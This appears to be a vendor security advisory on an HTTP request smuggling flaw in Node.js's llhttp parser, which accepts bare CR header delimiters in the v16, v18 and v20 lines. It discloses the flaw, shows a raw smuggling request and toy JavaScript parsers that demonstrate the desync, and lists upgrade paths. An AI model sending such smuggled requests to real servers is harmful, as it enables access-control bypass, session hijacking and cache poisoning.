HD-2024-1407

HTTP Request Smuggling
Affects
Node.js
>=16.0.0 <16.20.1, >=18.0.0 <18.16.1, >=20.0.0 <20.3.1
in
Node.js
Node.js NES
Patch Available
This Vulnerability has been fixed in the Never-Ending Support (NES) version offered by HeroDevs

Overview

The llhttp parser in the http module of multiple Node.js versions does not strictly require the CRLF sequence to delimit the header fields of an HTTP request, which can lead to HTTP Request Smuggling (HRS).

HTTP Request Smuggling interferes with the proper fulfillment of requests by an HTTP server: two layers that handle the same bytes (for example a front-end proxy and the Node.js back end) disagree about where one request ends and the next begins. The possible ramifications of a successful exploit include unauthorized access to a system, modification of data (in databases, user accounts and other records), session hijacking, information disclosure, cache poisoning and denial of service.

This issue affects the following versions of Node.js: 16.0.0 up to (but excluding) 16.20.1, 18.0.0 up to (but excluding) 18.16.1 and 20.0.0 up to (but excluding) 20.3.1.

Details

Vulnerability Info

This high-severity vulnerability is found in many versions of the llhttp library. Although RFC 7230 section 3 indicates that only the CRLF sequence should delimit each header field, vulnerable versions of the library also accept a lone CR character (without LF) as the end of a header field. A parser that accepts the extra delimiter and one that does not will split the same byte stream into different header fields and, consequently, different requests.

Since this library is bundled with Node.js, many versions of Node.js in the v16, v18 and v20 branches are affected.

There is no workaround.

Steps To Reproduce

  • Install a vulnerable version of Node.js on a server.
  • Craft an HTTP request that ends some header fields with a bare \r (CR) instead of \r\n (CRLF). In the example below every line terminator is written out. The first request ends its last two header fields and its header block with only \r, so a parser that accepts a bare CR as a delimiter (vulnerable llhttp) sees two complete requests, while a parser that only recognises CRLF treats everything from Content-Length up to the first CRLF as a single malformed header line and places the request boundary differently. The second request can therefore be hidden from, or misinterpreted by, one of the layers handling the connection. The second request is well formed, since every one of its lines ends with \r\n. Note that the body of the first request is exactly 13 bytes, so the second request line follows it immediately.
POST / HTTP/1.1\r\n
Host: example.com\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 13\r
Cookie: session=abc123\r
\r
data=payload1POST /secret HTTP/1.1\r\n
Host: example.com\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 13\r\n
\r\n
data=payload2
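To make the disagreement concrete, the following is an added example written for this page; it is not code from the advisory, from llhttp or from Node.js. It models the rule described under Vulnerability Info and the reproduction bytes above with two toy HTTP/1.1 parsers that differ in exactly one line: the 'crlf' policy ends a header line only at CRLF (a bare CR stays inside the line), and the 'cr' policy also ends a line at a bare CR, which is the behaviour described for vulnerable llhttp. The request bytes in SAMPLE, the policy names and the hasBareCR check are constructed for this example; only Content-Length bodies are modelled.

```javascript
'use strict';

// Added example for this advisory, not code from llhttp or Node.js.
// Two toy HTTP/1.1 request parsers that differ in one rule only:
//   'crlf' ends a header line at CRLF alone (a bare CR stays inside the line),
//   'cr'   also ends a header line at a bare CR, the behaviour described for
//          vulnerable llhttp.
// Only Content-Length bodies are modelled. SAMPLE and the policy names are
// constructed for this example.

// Locate the end of the line starting at `pos`. Returns { end, next } where
// `end` is the index just past the line text and `next` the first byte of
// the following line, or null when no terminator is found.
function findLineEnd(buf, pos, policy) {
  for (let i = pos; i < buf.length; i++) {
    if (buf[i] !== 0x0d) continue;                       // not a CR
    if (i + 1 < buf.length && buf[i + 1] === 0x0a) {
      return { end: i, next: i + 2 };                    // CRLF: both policies agree
    }
    if (policy === 'cr') return { end: i, next: i + 1 }; // bare CR accepted as terminator
    // 'crlf': a bare CR is just another byte of the line, keep scanning
  }
  return null;
}

// Parse one request head (request line plus header fields) starting at `pos`.
// Returns { requestLine, headers, bodyStart } or null if the head is incomplete.
function parseHead(buf, pos, policy) {
  const lines = [];
  let cur = pos;
  for (;;) {
    const le = findLineEnd(buf, cur, policy);
    if (le === null) return null;
    const line = buf.subarray(cur, le.end).toString('latin1');
    cur = le.next;
    if (line.length === 0) break;                        // empty line ends the head
    lines.push(line);
  }
  const headers = {};
  for (const l of lines.slice(1)) {
    const colon = l.indexOf(':');
    if (colon < 0) throw new Error(`malformed header line: ${JSON.stringify(l)}`);
    headers[l.slice(0, colon).toLowerCase()] = l.slice(colon + 1).trim();
  }
  return { requestLine: lines[0], headers, bodyStart: cur };
}

// Split a byte stream into the sequence of requests a parser using `policy` sees.
function splitRequests(buf, policy) {
  const requests = [];
  let pos = 0;
  while (pos < buf.length) {
    const head = parseHead(buf, pos, policy);
    if (head === null) break;                            // trailing incomplete request
    const len = Number(head.headers['content-length'] ?? 0);
    if (!Number.isInteger(len) || len < 0) throw new Error('bad Content-Length');
    const body = buf.subarray(head.bodyStart, head.bodyStart + len).toString('latin1');
    requests.push({ requestLine: head.requestLine, headers: head.headers, body });
    pos = head.bodyStart + len;
  }
  return requests;
}

// The check a parser that enforces the CRLF delimiter makes before guessing:
// true if the head (bytes before the first CRLFCRLF, or the whole buffer if
// there is none) contains a CR that is not immediately followed by LF.
function hasBareCR(buf) {
  const headEnd = buf.indexOf('\r\n\r\n');
  const limit = headEnd < 0 ? buf.length : headEnd;
  for (let i = 0; i < limit; i++) {
    if (buf[i] === 0x0d && buf[i + 1] !== 0x0a) return true;
  }
  return false;
}

// Constructed request bytes: the bare CR after "X-Note: a" hides the
// Content-Length field from the 'crlf' parser, so the 24-byte body that the
// 'cr' parser sees is a second, complete request to the 'crlf' parser.
const SAMPLE = Buffer.from(
  'POST / HTTP/1.1\r\n' +
  'Host: example.com\r\n' +
  'X-Note: a\rContent-Length: 24\r\n' +
  '\r\n' +
  'GET /secret HTTP/1.1\r\n\r\n',   // exactly 24 bytes
  'latin1');

// Show both views of the same bytes side by side.
for (const policy of ['crlf', 'cr']) {
  const seen = splitRequests(SAMPLE, policy);
  console.log(`${policy}: ${seen.length} request(s)`, seen.map((r) => r.requestLine));
}
console.log('bare CR in head:', hasBareCR(SAMPLE));
```

Run with `node` on any supported version; the parsers are self-contained and do not touch the real http module. The 'cr' view is one POST / carrying a 24-byte body; the 'crlf' view is a POST / with no body followed by a GET /secret. If the layer that makes the access decision parses like 'cr' (it authorises a single request to /) and the layer that serves requests parses like 'crlf', GET /secret is executed without ever being evaluated; with the roles reversed the same bytes produce the opposite disagreement. What removes the ambiguity is the hasBareCR behaviour: refusing input whose head contains a bare CR instead of choosing one of the two readings, which is what strict enforcement of the RFC 7230 delimiter amounts to.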

Mitigation

Users of Node.js release lines that are still under development or maintenance should upgrade to the latest version of the corresponding line (16.20.1, 18.16.1 or 20.3.1, or later).

Users of Node.js versions that are no longer supported should apply one of the following mitigations:

  • Upgrade affected applications to supported versions of Node.js.
  • Leverage a commercial support partner like HeroDevs for post-EOL security support.

Additional Resources

Vulnerability Details
ID: HD-2024-1407
Project affected: Node.js
Versions affected: >=16.0.0 <16.20.1, >=18.0.0 <18.16.1, >=20.0.0 <20.3.1
Published date: October 16, 2024
≈ Fix date: June 30, 2024
Fixed in:
Severity: High
Category: HTTP Request Smuggling